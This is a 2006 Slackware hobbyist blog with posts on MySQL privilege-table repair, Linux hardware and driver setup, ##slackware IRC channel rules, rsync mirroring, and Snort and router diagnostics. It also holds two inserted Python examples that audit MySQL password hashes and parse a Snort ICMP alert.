Thursday, December 28, 2006

MySQL database corruption: fix

When I upgraded my main tower to Slack v11.0, I had also upgraded MySQL to v5.0.24a (I don't know what version I was using before this). Soon after the upgrade, I noticed that I couldn't access my local PHPBB and PHPMyAdmin installs.

I was receiving the following error using the MySQL client:

bash-3.1$ mysql -u root -p
Enter password:
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)


The MySQL error logs looked like this:

061227 03:08:12 mysqld started
061227 3:08:12 [Warning] No argument was provided to --log-bin, and --log-bin-index was not used; so replication may break when this MySQL server acts as a master and has his hostname changed!! Please use '--log-bin=slackbox-bin' to avoid this problem.
061227 3:08:12 InnoDB: Started; log sequence number 0 4066534
061227 3:08:12 [Warning] Found invalid password for user: 'root @% '; Ignoring user
061227 3:08:12 [Note] /usr/libexec/mysqld: ready for connections.
Version: '5.0.24a-log' socket: '/tmp/mysql.sock' port: 0 Source distribution
061227 13:13:11 [Note] /usr/libexec/mysqld: Normal shutdown


Even after restarting the MySQL service, skipping grant tables, and resetting the password, the above still showed. So, I ran the following (after restarting the MySQL service using the init script):

bash-3.1$ mysql_fix_privilege_tables --verbose
This script updates all the mysql privilege tables to be usable by
MySQL 4.0 and above.

This is needed if you want to use the new GRANT functions,
CREATE AGGREGATE FUNCTION, stored procedures, or
more secure passwords in 4.1

You can safely ignore all 'Duplicate column' and 'Unknown column' errors
because these just mean that your tables are already up to date.
This script is safe to run even if your tables are already up to date!

ERROR 1060 (42S21) at line 22: Duplicate column name 'File_priv'
ERROR 1060 (42S21) at line 28: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 29: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 30: Duplicate column name 'Grant_priv'
ERROR 1060 (42S21) at line 41: Duplicate column name 'ssl_type'
ERROR 1146 (42S02) at line 67: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 68: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 70: Table 'mysql.procs_priv' doesn't exist
ERROR 1146 (42S02) at line 72: Table 'mysql.procs_priv' doesn't exist
ERROR 1054 (42S22) at line 94: Unknown column 'Type' in 'columns_priv'
ERROR 1060 (42S21) at line 100: Duplicate column name 'type'
ERROR 1060 (42S21) at line 110: Duplicate column name 'Show_db_priv'
ERROR 1060 (42S21) at line 127: Duplicate column name 'max_questions'
ERROR 1060 (42S21) at line 137: Duplicate column name 'Create_tmp_table_priv'
ERROR 1060 (42S21) at line 140: Duplicate column name 'Create_tmp_table_priv'
ERROR 1061 (42000) at line 145: Duplicate key name 'Grantor'
ERROR 1054 (42S22) at line 247: Unknown column 'Create_view_priv' in 'where clause'
ERROR 1054 (42S22) at line 277: Unknown column 'Create_routine_priv' in 'where clause'
ERROR 1054 (42S22) at line 313: Unknown column 'Create_user_priv' in 'where clause'
done
bash-3.1$


After that, I was able to access the databases using the root MySQL account:

bash-3.1$ mysql -u root
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO)
bash-3.1$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2 to server version: 5.0.24a-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> quit
Bye
bash-3.1$


The issue? Apparently, there were three duplicates of the "Grant_priv" column, which I don't think was the REAL issue. Per the script notes, duplicates don't appear to break anything, but looking at where the script notes state, "This script updates all the mysql privilege tables to be usable by MySQL 4.0 and above," I wonder if that's all I needed to do (because I upgraded to a higher version).
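One check worth running after an upgrade like this is an audit of what is actually in mysql.user, because the "Found invalid password for user: 'root @% '; Ignoring user" warning in the error log above is what mysqld prints when a row's Password column is in neither of the two formats it recognises (a 16-hex-character pre-4.1 hash or a 41-character '*'-prefixed 4.1+ hash); such rows are skipped entirely when the grant tables load, which is one way to end up with an "Access denied" for an account that exists. The following is an added example, not code from the post: it classifies each user@host row from a constructed tab-separated dump of `SELECT User, Host, Password FROM mysql.user` and pulls the ignored accounts out of the error-log lines quoted above. The sample rows are constructed (both hashes are the well-known hashes of the string "password"); the function names are my own.

```python
import re

# Constructed sample rows, in the tab-separated form
#   mysql -N -e "SELECT User, Host, Password FROM mysql.user"
# prints them. Not real data from the post.
SAMPLE_USER_ROWS = """\
root\tlocalhost\t*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
root\tslackbox\t5d2e19393cc5ef67
phpbb\tlocalhost\t
root\t%\tnot-a-hash
"""

# The warning line quoted in the post, used here as sample error-log input.
SAMPLE_ERROR_LOG = """\
061227 3:08:12 InnoDB: Started; log sequence number 0 4066534
061227 3:08:12 [Warning] Found invalid password for user: 'root @% '; Ignoring user
061227 3:08:12 [Note] /usr/libexec/mysqld: ready for connections.
"""

# Hash formats mysqld 5.0 accepts in mysql.user.Password:
#   pre-4.1 hash:   exactly 16 hex characters
#   4.1+ hash:      '*' followed by 40 hex characters (SHA-1 based)
# Anything else is rejected at grant-table load time and the row is ignored.
OLD_HASH_RE = re.compile(r"^[0-9a-fA-F]{16}$")
NATIVE_HASH_RE = re.compile(r"^\*[0-9a-fA-F]{40}$")
IGNORED_USER_RE = re.compile(
    r"\[Warning\] Found invalid password for user: '(.*?)'; Ignoring user"
)


def classify_password_hash(value):
    """Return 'none', 'pre41', 'native41' or 'invalid' for one Password value."""
    if value == "":
        return "none"
    if NATIVE_HASH_RE.match(value):
        return "native41"
    if OLD_HASH_RE.match(value):
        return "pre41"
    return "invalid"


def audit_user_rows(tsv_text):
    """Classify every user@host row. Rows flagged ignored_by_server will never
    authenticate; rows flagged needs_rehash still work but carry the weak
    pre-4.1 hash and should get a SET PASSWORD after the upgrade."""
    report = []
    for line in tsv_text.splitlines():
        if not line.strip():
            continue
        fields = line.split("\t")
        if len(fields) != 3:
            raise ValueError("expected 3 tab-separated fields: %r" % line)
        user, host, password = fields
        kind = classify_password_hash(password)
        report.append({
            "user": user,
            "host": host,
            "hash_kind": kind,
            "ignored_by_server": kind == "invalid",
            "needs_rehash": kind == "pre41",
        })
    return report


def ignored_users_from_log(log_text):
    """Collect the user@host strings mysqld reported as ignored in its error log."""
    ignored = []
    for line in log_text.splitlines():
        m = IGNORED_USER_RE.search(line)
        if m:
            ignored.append(m.group(1))
    return ignored


if __name__ == "__main__":
    for row in audit_user_rows(SAMPLE_USER_ROWS):
        print(row)
    print("ignored per error log:", ignored_users_from_log(SAMPLE_ERROR_LOG))
```

Run it against a real dump by piping the `mysql -N -e ...` output into `audit_user_rows`; any row that comes back `ignored_by_server` is an account the server silently dropped, and the error log should name the same user@host.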

I sometimes become so reliant upon PHPMyAdmin that I don't always know how to fix underlying issues. It looks like I'll be delving into the MySQL command line more often, just to understand MySQL at a base level before utilizing front-end tools, or at least reference PHPMyAdmin's SQL query statements a bit more (which is a very cool feature, as the front-end shows what it's doing as command-line SQL).

I'm betting some of you are wondering why I'm using PHPBB on my LAN. I use it as a note-taking tool. Whatever machine I'm on in my LAN, I can reference important notes or create notes that are in a central location. Even if I'm at work or at a coffee shop, I can tunnel into my LAN and view all my notes. The only thing I have to remember is to back up my databases religiously so I don't lose very important data that will hinder my work at home (and somewhat at my workplace). Yeah, I know that there may be better ways to take notes, but my notes sometimes tend to be lengthy and when I'm troubleshooting, it's easy to create a thread of trial-and-error posts so I can keep track of what I need to do, what I've already done, or what I shouldn't do. There aren't too many tools that can organize and store data like a CMS can. :)

Happy Holidays!!

Tuesday, October 24, 2006

Using a PCMCIA Wifi Card On Your Laptop - Closed-source Chipsets

I've got my WPC54GS Linksys wifi card, which uses a closed-source chipset (Broadcom), working with Slackware 10.2 installed on a Dell Inspiron 8500. I've posted the process to get this working before at slackwiki.org.

I've scripted this process. You can grab the script from here. Edit it as you see fit. Many people actually use the tools that come with Slackware (the wireless configs in /etc/rc.d, I believe). I script my own, as I've many different wifi cards that I often swap out for different needs.

Anyways, give it a shot.

My next task is getting WPA working with the card (wpa_supplicant, I believe).

Ever Wonder How to Use A Mouse & Touchpad in X?

I remember, awhile back, I got a USB mouse and touchpad working in X on my first laptop (using Suse). Many people still ask this question in ##slackware.

All you do is ensure you have the following within your xorg.conf file:


Section "ServerLayout"
Identifier "X.org Configured"
Screen 0 "Screen0" 0 0
InputDevice "Mouse0" "CorePointer"
InputDevice "Mouse1" "SendCoreEvents"
InputDevice "Keyboard0" "CoreKeyboard"

.
.
.

Section "InputDevice"
Identifier "Mouse0"
Driver "mouse"
Option "Protocol" "auto"
Option "Device" "/dev/mouse"
EndSection

Section "InputDevice"
Driver "mouse"
Identifier "Mouse1"
Option "Device" "/dev/input/mice"
Option "Name" "Autodetection"
Option "Protocol" "imps/2"
Option "Vendor" "Logitech"
EndSection


The lines you have to add to your pre-existing configuration are the Mouse1 entries (the bold print in the original post): the InputDevice "Mouse1" "SendCoreEvents" line in the ServerLayout section and the second InputDevice section that defines Mouse1.

The whole file is here.

Give it a whirl...and good luck!

Sunday, October 22, 2006

Recently Acquired a Dell Precision 220, Installed ZenWalk 3.0 on it

Yes, I got a Dell Precision 220 from work that they were going to throw in the trash (along with a Dell 17" CRT monitor). It lacked RAM and a hard disk. I scrounged up some RAM and this was a difficult task, as the system requires RAMBUS. I found 128MB between two chips of RAMBUS, which isn't a lot but it gets the system working. The system also supports SMP but only has one processor at the moment, a PIII Coppermine 650MHz CPU. It is peppy enough with ZenWalk.

Why ZenWalk? Because I've Slackware running on three systems already and wanted to try ZenWalk, which is a derivative of Slackware. It does well.

The system currently has three NICs, which is why I will eventually place it on firewall duty.

I'm trying to score two 1GHz CPUs (the max this system will take), although they'll have to be PIII Coppermines and also be matched. I found one such matching set locally on Craigslist, but have yet to coordinate a meet/buy. I may even put them into my Dell Precision 410 instead, and swap out the 410's 450MHz CPUs to the Precision 220.

I'll keep you informed on how ZenWalk is, as the days go by.

Friday, October 20, 2006

Xine and adding .wmv support; ModSecurity using Slackware 9.0 and Apache 1.3.37

I don't know why I hadn't done this before, but last night, I finally added .wmv support to Xine, following the directions at http://xinehq.de/index.php/faq#WMV. I had it functional using .wmv support within 5 minutes.

Please don't email me about how you got it working with mplayer. I don't do mplayer and any mplayer comments won't add value to my Xine experience. :)

I've also given ModSecurity a spin (see http://www.modsecurity.org/). It's VERY nice. I'm using it on my public Apache server (version 1.3.37), which runs Slackware 9.0...yes, I need to update, but it's as production as I can get it and it is hardened, so I'm not so worried about it being quite a bit behind the versioning scheme. As long as it works.

What is ModSecurity? From the website, "ModSecurity is an embeddable web application firewall. It provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring and real-time analysis with no changes to existing infrastructure." You can also get a core ruleset from the same site. I've been trying to create my own rules with nil results, so I think I'll give the core rules a shot.

Try ModSecurity. I'm sure you'll like the logging, at the very least.

Tuesday, October 03, 2006

Slackware v11 out!!

From the Slackware-current changelog:

Sun Oct 1 23:50:53 CDT 2006
Slackware 11.0 is released. Thanks to everyone who helped out and made this
release possible. If I forgot you in the ChangeLog, mea culpa, but you know
who you are, and thanks. :-)
Enjoy! -P.

Sunday, October 01, 2006

Slack Machine Woes Fixed!

My Slack tower is fixed.

The root cause was that, somehow, when I created a new partition from some free space on the drive, the Slack install didn't like it one bit and complained the whole time. I'm not going to blame Gparted, though...

On this system, I use / to house the whole Slackware install, using /home as a directory instead of having it as its own partition. /home was 9+ GB and growing, so that / was at 92% in utilization. I decided to move it to its own partition. Using Gparted, I created a partition (/dev/hdb5). There were currently two primary partitions already on the drive (/ and swap), so I decided to create a logical partition to house /home. Somehow, Gparted fux0red the extended partition, I think.

Soon after I created the partition, I began to see boot errors hinting that there was a corruption problem with this drive, although if I sat through the boot errors, they'd finally stop and I'd get a login prompt.

I misdiagnosed the issue and thought that this 7-year-old drive had finally given up the ghost. I almost trashed the drive but decided to give it another shot by removing the extended partition and making a new partition, a primary one. In fact, I made two and moved /home to one of them (/dev/hdb2, I believe). Afterward, I adjusted my /etc/fstab to see /home and rebooted. There were no more errors on boot.

Next, I need to start doing nightly/weekly backups (somehow), then maybe clear out my /home and get rid of some junk (maybe backup to DVD).

Tuesday, September 26, 2006

Slackware-current is at RC5, as of 21 September

Yes, this is the longest string of RC status ever. Pat promises that this will be the last version before release. There's still a good bit of changelog activity, though.

Also, I've lost my Slackware tower. Well, it's still here, but one of the drives went corrupt. I saw a ton of corruption in my Slack install's dmesg that didn't clear after doing an fsck. If anything it got a LOT worse. Luckily, I'd just done a backup of my /home dir to another drive, LIKE 5 MIN BEFORE THE DRIVE STARTED THROWING ERRORS! Talk about lucky. Now, I have an issue. This tower doesn't have a floppy drive (although I can hook one up). I need a floppy so I can boot up using a WinXP or MSDOS floppy that contains the format command...you see, I have to clear lilo from the boot drive's MBR before I can be able to use the system again, as the system currently tries to boot me into the bad drive (which I've removed...I'll double-check later whether it's salvageable or not).

I guess this means I'm in the market for a new hard disk. This is the perfect opportunity for me to get another SATA drive, preferably higher capacity than my 160GB drive. The drive that went corrupt was a Maxtor 60GB drive that I bought around 1999-2000...talk about long lived. What brand will I get next? Most likely a Seagate or Maxtor. I may get another 160GB Seagate so that I can give RAID a go (I've an onboard SATA RAID controller).

For now, I've no working Slackware machine...OK, shoot me cuz I just lied. I've my Dell Inspiron 8500 and my Toshiba Satellite 1GHz. Both need to be rsync'd, which means I have to use CAT5 to do the sync...last time I did an rsync over wifi, it wasn't pretty.

Anyways, I've my work cut out for me for the next two weeks. AND, I've to study so I can take the CCSA and CCSE exams.

Thursday, September 07, 2006

Slackware now at RC4 status, as of 3 Sep 2006

Yes, Slack is at RC4 now, and has been a bit dormant since the 3rd of September, with quite a few updates. The quietness may be a good indication that things are almost ready to go stable. We shall see.

I've yet to update to RC4, but maybe I'll get the chance this weekend.

Wednesday, August 30, 2006

Slackbox is now at RC3

I updated my machine to Slackware v11.0 RC3 last night. It didn't take long and I also moved my local mirror. I haven't noticed much of any difference in RC1 or RC2, function-wise. Nothing appears broken, although since I'm using 2.6.17.8, I've noticed a lot of 'atkbd' errors in my /var/log/messages file, which I attribute to my KVM not agreeing with that kernel. We shall see...

Sunday, August 27, 2006

Slackware Wikipedia Entry, ##slackware road rage that has to stop

Here it is: http://en.wikipedia.org/wiki/Slackware

The above link is for people who constantly enter ##slackware asking what Slackware is about or how it compares to other distributions.

The questions are highly irritating, as the information is ALL over the internet and people tend to not use http://www.google.com as it was intended. There are comparisons between Slackware and other distributions everywhere. Information on Slackware and its philosophy is also everywhere, so it is a bit ridiculous going to ##slackware and asking for comments, especially when one will most likely receive biased opinions: of course we aren't going to slight our own distribution.

##slackware on the whole has become very weird lately. We've lost a few old-timers that offered excellent support. We've also decided to kill the more off-topic banter unless there is absolutely nothing else to chat about...then we tend to get visitors who think we serve them like it is a paying job and we're customer support. We also have regulars who try to dictate to the channel operators the way the channel should be run...they pretty much threaten to hijack the userbase by opening other channels if they don't get their way or say in the matter.

I should explain how things should work:

1. I'm the head operator of ##slackware on irc.slackware.com. I maintain the channel's chat flow. I don't lord it over the channel. Proof that I do not abuse operator power is documented in your own IRC client logs (if you've visited ##slackware) or at http://wigglit.ath.cx/slackware_botlogs/.

2. The guidelines are enforced by the operators based on the guidelines posted at http://wigglit.ath.cx/slackware-rules/rules.shtml. Those rules SUPERSEDE the server guidelines (http://freenode.net/channel_guidelines.shtml). What's good for the server isn't necessarily good for our channel. Don't complain to the server ops about this because they will not become involved, as is their policy...they don't govern the channels, that's what the channel ops are for.

3. The channel guidelines are just that: guidelines. They are there to give the visitors an inkling of what's accepted and what's not. These are not constitutional laws, so when you find yourself banned because you think we won't take away your speech and we do, realize that IRC doesn't give you the right to tell someone to fuck off or post porn links or 'fight the man', with 'the man' being the channel operators.

4. Visitors should NOT expect us to answer every question that is asked. Some of us have day jobs. Some have families. Some may not have the experience or knowledge to answer the question. Some don't care. Don't expect the conversation to gravitate toward you when you ask a question. Current discussions may not stop when you ask your question, so don't get ticked off...keep asking (within limits; don't spam the channel with the same question every 60 seconds or you will get removed), maybe every 3 or so minutes. Also, BE SURE YOUR QUESTION PERTAINS TO SLACKWARE, AND NOT SOFTWARE THAT MAY BE INCLUDED IN SLACKWARE'S BASE INSTALL!! This means that if you've an issue with KDE or a KDE application that's installed on your Slackware distribution, your issue isn't Slackware-related, it's KDE-related, unless you can PROVE that the underlying issue is indeed related to Slackware. This also applies to hardware.

5. If anything happens in the channel that upsets you, take a deep breath and use your IRC client's ignore function to filter out the unwanted chatter. Don't take the matter into your own hands by insulting the offender, as you may become kicked or banned from the channel, regardless of your intentions. We recently had an incident where someone decided to attack someone based on the perception that the victim was overweight. The offender was asked to stop with a 'first and last warning' but continued 10 minutes later and was banned. Also, at this point, the victim had previously been passive to the attack, but became aggressive when the attacker ignored the operator's warning. After the attacker was banned, an onlooker decided to join the fray by insisting that the victim should also be banned because the victim defended himself by attacking also. The fact remains that the first attacker was banned because he directly ignored an operator's warning. The onlooker was also banned because he couldn't let this issue, which was none of his business, die. Is all of this considered favoritism? In the above context, no, but if you're someone who is used to inciting anarchy, the rules/guidelines of ##slackware will never be enough. This is why every operator is empowered to handle things as they see fit, even when an abuser's tactics skirt the guidelines.

6. Lastly, if you bait an operator just for the sake of skirting guidelines, you're going to lose that battle. An intellectual debate is one thing, a targeted yet subtle attack is beyond the norm and will be dealt with.

I'll probably be posting the link to this entry to ##slackware so people can be aware of how asinine the drama in ##slackware has been lately.

A good example of some of the above activity can be found at this link:

http://wigglit.ath.cx/slackware_botlogs/slackware.log.27Aug2006

Use your browser's find function to find 'corto' and read from there until he gets his voice taken (around 4:22PM).

Slack-current now at RC3 status -- v11.0 release imminent !!

August 25th proved to be quite an active day for the -current changelog.

So, today, I've rsynced a mirror to my local mirror. FYI, I use the following when I rsync:

rsync --delete --progress --delete-excluded --exclude source/ --exclude zipslack/ -lpvrtz slackware.mirrors.tds.net::slackware/slackware-current /mnt/backup/ftp/pub/mirrors/slackware/

When I rsynced, I did it at 1:51PM and it finished at 1:57PM:

sent 381697 bytes received 545507254 bytes 1489465.08 bytes/sec
total size is 1890230078 speedup is 3.46

That's a pretty fast update in 6 minutes! Gotta love FiOS!

Anyways, when it is quiet today, I'll rsync my tower to RC3 then maybe do the same for my Toshiba (which is running v10.1, I think).

Friday, August 25, 2006

Slackware-current @ RC2 status ... Slack v11.0 should appear any day now!!

As you can see in the Slackware-current changelog, -current is at RC2 and has been for a few days.

I'm currently at RC1 on my main workstation...AND using the 2.6 kernel! As that machine uses SATA, I had a bit of a time getting my SATA drive to be seen. The box would boot (the main drive uses EIDE) but I couldn't reach out to my other drives installed in that machine. Well, all it took was to activate the proper module (I'll reference the driver later) to get SATA enabled again.

I've had no issues with RC1, but I'd like to upgrade my Toshiba to RC1 sometime this weekend, to see if there are any wireless issues. My Dell needs to be upgraded to RC1 also, but I hardly use the Linux partition on that laptop.

Other than that, Slackware is chugging along fine on my machines (and my public website at http://wigglit.ath.cx).

Monday, August 07, 2006

UPDATE - http://www.unixfool.com/slack9isolist.shtml

I've semi-updated the mirrors list. This list documents which Slackware mirrors contain ISOs for download. The title of the page is misleading, as it was created when v9.0 was considered fresh. I've checked the links and every link that is working contains v10.2.

I'll go through http://www.slackware.com/getslack to see which mirrors were added since my previous update, then I'll update my pages to reflect the new mirrors.

[EDIT -

I've stopped editing http://www.unixfool.com/slack9isolist.shtml, as it appears that almost every mirror now contains .iso files for the latest versions of Slackware. When this page was initially constructed, many users complained that they couldn't find .iso files on the mirrors, which wasn't the case. I immediately went through all the mirrors published on http://www.slackware.com/getslack and found approximately 10 that offered .iso files.

I may remove that page, as it is currently useless.]

On a side note, I've recently had Verizon's FiOS installed in my home. All I can say is, IT FLIES! And, I can't get enough of the router itself, an Actiontec MI424WR wireless router that appears to be much much more than a SOHO router, as it has TONS of options and configurability. I'm going to be enjoying this router and hope to keep it once my 1-year contract has ended. The only thing my previous router (Linksys WRT54GX4) has that is better is wireless range, and that's because it's a MIMO (three antennas) router.

I'll keep you guys posted on the FiOS front.

Also, it appears that Slackware has been releasing a ton of bugfixes. Let me restate: it isn't a Slackware-related issue; the updates are related to software (MySQL, Apache...). There has also been a lot of activity in regards to regular -current updates. I'm hoping this means v11.0 is almost ready. I've been rsync'ing like crazy lately, trying to keep current on -current (LOL).

OK, it's late here. G'night!

Wednesday, July 19, 2006

Patiently awaiting Slackware v11.0, Recent Snort Logs...

Yeah, I'm awaiting the release of Slackware v11.0. I should try to rsync my -current machines, which are on v10.1, I believe. That way I'll only have a short sync when v11.0 is released.

I also am scrubbing my logs on wigglit.ath.cx since I've been vacationing and had to attend a funeral in the last two weeks. I saw the below:

[**] [1:485:4] ICMP Destination Unreachable Communication Administratively Prohibited [**]
[Classification: Misc activity] [Priority: 3]
07/19-11:06:44.523876 0:B0:4A:6C:76:53 -> FE:FD:40:3E:E7:DC type:0x800 len:0x46
64.65.236.206 -> 66.160.141.30 ICMP TTL:246 TOS:0x0 ID:28020 IpLen:20 DgmLen:56
Type:3 Code:13 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED,
PACKET FILTERED
** ORIGINAL DATAGRAM DUMP:
66.160.141.30:43212 -> 64.65.236.206:113 TCP TTL:53 TOS:0x0 ID:15954 IpLen:20 DgmLen:56 DF
Seq: 0xB4CEF72C Ack: 0x10001
** END OF DUMP

I believe I've seen this before in my logs but I want to further investigate it to get a better understanding of what it means.
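What this alert records is known: ICMP type 3 (Destination Unreachable) code 13 (Communication Administratively Prohibited) is the message a router or firewall sends back when it drops a packet by policy rather than because of a routing failure, and the "ORIGINAL DATAGRAM DUMP" section is the header of the packet that was dropped. Reading the dump above, that packet was a TCP connection from 66.160.141.30 (the host being monitored) to 64.65.236.206 on port 113 (ident/auth), so the alert is a reply to the host's own outbound traffic, not an inbound probe. As an added example that is not part of the post, the following parses a Snort full-format ICMP alert into its fields and prints that interpretation; the alert text is the one quoted above, the function names and the small service-name table are my own.

```python
import re

# The alert quoted in the post, embedded verbatim as the sample input.
SNORT_ALERT = """\
[**] [1:485:4] ICMP Destination Unreachable Communication Administratively Prohibited [**]
[Classification: Misc activity] [Priority: 3]
07/19-11:06:44.523876 0:B0:4A:6C:76:53 -> FE:FD:40:3E:E7:DC type:0x800 len:0x46
64.65.236.206 -> 66.160.141.30 ICMP TTL:246 TOS:0x0 ID:28020 IpLen:20 DgmLen:56
Type:3 Code:13 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED,
PACKET FILTERED
** ORIGINAL DATAGRAM DUMP:
66.160.141.30:43212 -> 64.65.236.206:113 TCP TTL:53 TOS:0x0 ID:15954 IpLen:20 DgmLen:56 DF
Seq: 0xB4CEF72C Ack: 0x10001
** END OF DUMP
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
HEADER_RE = re.compile(r"\[\*\*\] \[(\d+):(\d+):(\d+)\] (.+?) \[\*\*\]")
CLASS_RE = re.compile(r"\[Classification: (.+?)\] \[Priority: (\d+)\]")
IP_RE = re.compile(r"^" + IPV4 + r" -> " + IPV4 + r" ICMP TTL:(\d+)")
ICMP_RE = re.compile(r"^Type:(\d+) Code:(\d+)")
ORIG_RE = re.compile(r"^" + IPV4 + r":(\d+) -> " + IPV4 + r":(\d+) (TCP|UDP)")

# Type 3 codes that mean "dropped by policy" rather than "undeliverable" (RFC 1812).
ADMIN_PROHIBITED_CODES = {9, 10, 13}
# Minimal port -> service table for the summary; extend as needed.
SERVICE_NAMES = {113: "ident/auth", 25: "smtp", 80: "http", 443: "https"}


def parse_snort_icmp_alert(text):
    """Parse one Snort full-format ICMP alert into a dict of its fields."""
    alert = {"original": None}
    for line in text.splitlines():
        m = HEADER_RE.search(line)
        if m:
            alert.update(gid=int(m.group(1)), sid=int(m.group(2)),
                         rev=int(m.group(3)), msg=m.group(4))
            continue
        m = CLASS_RE.search(line)
        if m:
            alert.update(classification=m.group(1), priority=int(m.group(2)))
            continue
        m = IP_RE.match(line)
        if m:
            alert["ip"] = {"src": m.group(1), "dst": m.group(2), "ttl": int(m.group(3))}
            continue
        m = ICMP_RE.match(line)
        if m:
            alert["icmp"] = {"type": int(m.group(1)), "code": int(m.group(2))}
            continue
        m = ORIG_RE.match(line)
        if m:
            # Header of the packet the ICMP error is complaining about.
            alert["original"] = {"src": m.group(1), "src_port": int(m.group(2)),
                                 "dst": m.group(3), "dst_port": int(m.group(4)),
                                 "proto": m.group(5)}
    for key in ("sid", "ip", "icmp"):
        if key not in alert:
            raise ValueError("alert is missing its %s line" % key)
    return alert


def summarize(alert):
    """Explain who sent the ICMP error and which packet it refers to. A type 3
    error is addressed to the sender of the original datagram, so if that
    sender is the monitored host, the alert is about its own outbound traffic."""
    icmp = alert["icmp"]
    if icmp["type"] != 3:
        return "ICMP type %d is not Destination Unreachable; not handled here" % icmp["type"]
    orig = alert["original"]
    if orig is None:
        return "Destination Unreachable from %s with no embedded datagram" % alert["ip"]["src"]
    service = SERVICE_NAMES.get(orig["dst_port"], "port %d" % orig["dst_port"])
    reason = ("a filter (ACL/firewall) deliberately rejected it"
              if icmp["code"] in ADMIN_PROHIBITED_CODES
              else "it could not be delivered (code %d)" % icmp["code"])
    own_traffic = orig["src"] == alert["ip"]["dst"]
    note = ("This is a reply to the monitored host's own outbound connection, not an inbound probe."
            if own_traffic else
            "The embedded datagram was not sent by the host that received the error; treat as anomalous.")
    return "%s tried %s to %s:%d (%s); %s answered that %s. %s" % (
        orig["src"], orig["proto"], orig["dst"], orig["dst_port"], service,
        alert["ip"]["src"], reason, note)


if __name__ == "__main__":
    print(summarize(parse_snort_icmp_alert(SNORT_ALERT)))
```

Port 113 is the ident service; daemons such as mail and IRC servers commonly open an ident connection back to a client that has just connected to them, so an outbound SYN to 113 that a remote network refuses is normal background noise rather than something to chase, which is what the summary spells out.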

I've been neglecting my Slackware installs the last month, as I've recently purchased a white Mac Book (2.0 GHz). I'm currently trying to get used to the internal file structure and commands, as they sometimes differ from FreeBSD's typical commands. I've also started a blog documenting my Mac experiences ... see it at http://whitemacbook.blogger.com .

Wednesday, June 28, 2006

Been Busy...again

Hi,

Yeah, I've been busy. Work-related stuff, really, although Summer is upon us and I also have to deal with the kids and relatives visiting (and visiting relatives). I haven't had much time to slack around with Slackware, although I did purchase a Mac Book 7 days ago.

I'll be attempting to build a dedicated box that firewalls and routes traffic. For some reason, I get a lot of latency with my current setup. I've a Netgear FVS114 FW/VPN SOHO set-top box as my router/switch and a Linksys WRT54GX4 that I use as a WAP. The Linksys is on its own subnet since I wanted to experiment with securing my WAP in the best manner. I love the Netgear's capabilities (it appears more capable than the Linksys in doing what I want to do...I've already run into issues where I think I was asking the Linksys to do things it wasn't designed to do). I plan to configure a VPN tunnel between the Netgear and a friend's gateway, to build my VPN skills. What I don't like is the fact that the Netgear appears to lag under load:

ron@delly$ ping 10.150.1.1
PING 10.150.1.1 (10.150.1.1): 56 data bytes
64 bytes from 10.150.1.1: icmp_seq=0 ttl=64 time=1.790 ms
64 bytes from 10.150.1.1: icmp_seq=1 ttl=64 time=1.147 ms
64 bytes from 10.150.1.1: icmp_seq=2 ttl=64 time=1.138 ms
64 bytes from 10.150.1.1: icmp_seq=3 ttl=64 time=1.501 ms
64 bytes from 10.150.1.1: icmp_seq=4 ttl=64 time=1.136 ms
64 bytes from 10.150.1.1: icmp_seq=5 ttl=64 time=1.144 ms
64 bytes from 10.150.1.1: icmp_seq=6 ttl=64 time=1.185 ms
64 bytes from 10.150.1.1: icmp_seq=7 ttl=64 time=1.153 ms

I'm not seeing any packets being dropped, but look at the times! I don't remember them being like that before, although my niece (or rather my wife's niece) does do some heavy downloading, I think.

Anyways, here's the WAP's ping results:

ronald-sinclairs-computer:~ rsinclair$ ping 192.168.1.1
PING 192.168.1.1 (192.168.1.1): 56 data bytes
64 bytes from 192.168.1.1: icmp_seq=0 ttl=64 time=2.571 ms
64 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=2.246 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=2.392 ms
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=2.253 ms
64 bytes from 192.168.1.1: icmp_seq=4 ttl=64 time=1.728 ms
64 bytes from 192.168.1.1: icmp_seq=5 ttl=64 time=1.924 ms
64 bytes from 192.168.1.1: icmp_seq=6 ttl=64 time=1.680 ms
64 bytes from 192.168.1.1: icmp_seq=7 ttl=64 time=2.368 ms
64 bytes from 192.168.1.1: icmp_seq=8 ttl=64 time=2.792 ms

NASTY! Again, there is no apparent packet loss, but look at the times.

At work, when I'm shelled into home, I can barely work, as I have to wait for keystrokes to register and also will occasionally lose my SSH connection. I will check my Snort output and logs to make sure I'm not being hammered by someone.

Monday, June 05, 2006

Trident Video Drivers?

I'm currently using one of my two laptops (Toshiba Satellite 1805-S274), trying to get X.org drivers working with this laptop. I think I've the driver working with X.org:

bash-3.00$ sudo cat /var/log/Xorg.0.log | grep trident
(II) LoadModule: "trident"
(II) Loading /usr/X11R6/lib/modules/drivers/trident_drv.o
(II) Module trident: vendor="X.Org Foundation"
bash-3.00$

So, it appears that the driver is loaded, yet:

bash-3.00$ glxgears
324 frames in 7.0 seconds = 46.286 FPS
291 frames in 7.0 seconds = 41.571 FPS
140 frames in 5.0 seconds = 28.000 FPS
280 frames in 8.0 seconds = 35.000 FPS
140 frames in 5.0 seconds = 28.000 FPS
bash-3.00$

Those FPS aren't all that hot. Running 'glxinfo', I get the following:

bash-3.00$ glxinfo
name of display: :0.0
display: :0 screen: 0
direct rendering: No
server glx vendor string: SGI
server glx version string: 1.2
server glx extensions:
GLX_ARB_multisample, GLX_EXT_visual_info, GLX_EXT_visual_rating,
GLX_EXT_import_context, GLX_OML_swap_method, GLX_SGI_make_current_read,
GLX_SGIS_multisample, GLX_SGIX_fbconfig
client glx vendor string: SGI
client glx version string: 1.4
client glx extensions:
